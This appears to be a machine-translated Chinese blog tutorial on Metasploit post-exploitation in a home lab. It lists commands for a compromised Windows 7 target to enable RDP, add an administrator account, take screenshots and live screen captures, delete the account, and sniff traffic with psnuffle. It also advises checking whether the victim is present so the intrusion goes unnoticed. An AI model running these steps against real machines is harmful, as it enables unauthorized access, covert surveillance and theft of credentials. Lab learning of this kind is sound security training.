当前位置:网站首页>Intranet information collection of Intranet penetration (2)
Intranet information collection of Intranet penetration (2)
2022-07-06 14:17:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
05 Open and connect 3389
see 3389 Port opening

Turn on 3389 Remote desktop
run post/windows/manage/enable_rdp
run getgui -e

You can use this command to add users on the target machine :
run getgui -u admin -p [email protected]( Some system passwords have to meet the complexity to create )
net localgroup administrators admin /add( take admin Users are added to the administrators group )

Remote connection to desktop
rdesktop -u username -p password ip

yes And then it's going to pop up GUI page ( If the user is not added to the administrator group, you cannot log in )

After logging in, you will be prompted to close win7( So we should observe whether the target plane is used in advance , In order to avoid being perceived by users to be attacked )

View remote desktop
screenshot( Intercept win7 Current screen , Check whether someone is using )

use espia
screengrab
screenshare( Get... In real time win7 The screen , Similar to the video style open in the browser )

Delete the specified account
run post/windows/manage/delete_user USERNAME=admin
06 Packet capture
Grab the bag
Load sniffer
Sniffer_interfaces
Sniffer_start 2
Sniffer_dump 2 1.cap
decode
Use auxiliary/sniffer/psnuffle
Set PCAPFILE 1.cap
exploit
边栏推荐
- 实验四 数组
- Network layer - simple ARP disconnection
- Data mining - a discussion on sample imbalance in classification problems
- Experiment 7 use of common classes (correction post)
- Package bedding of components
- 【Numpy和Pytorch的数据处理】
- Canvas foundation 2 - arc - draw arc
- Interpretation of iterator related "itertools" module usage
- 浅谈漏洞发现思路
- Spot gold prices rose amid volatility, and the rise in U.S. prices is likely to become the key to the future
猜你喜欢

Hackmyvm target series (4) -vulny

7-7 7003 组合锁(PTA程序设计)

Hackmyvm target series (6) -videoclub

记一次,修改密码逻辑漏洞实战

Sqqyw (indifferent dot icon system) vulnerability recurrence and 74cms vulnerability recurrence

网络基础之路由详解

附加简化版示例数据库到SqlServer数据库实例中

Mixlab unbounded community white paper officially released

Yugu p1012 spelling +p1019 word Solitaire (string)

7-5 staircase upgrade (PTA program design)
随机推荐
内网渗透之内网信息收集(四)
HackMyvm靶机系列(7)-Tron
Xray and Burp linked Mining
Attack and defense world misc practice area (GIF lift table ext3)
Web vulnerability - File Inclusion Vulnerability of file operation
Harmonyos JS demo application development
7-7 7003 组合锁(PTA程序设计)
Intranet information collection of Intranet penetration (5)
7-9 make house number 3.0 (PTA program design)
HackMyvm靶机系列(3)-visions
实验四 数组
Windows platform mongodb database installation
Which is more advantageous in short-term or long-term spot gold investment?
[experiment index of educator database]
Poker game program - man machine confrontation
7-3 construction hash table (PTA program design)
sqqyw(淡然点图标系统)漏洞复现和74cms漏洞复现
7-8 7104 Joseph problem (PTA program design)
【MySQL-表结构与完整性约束的修改(ALTER)】
攻防世界MISC练习区(SimpleRAR、base64stego、功夫再高也怕菜刀)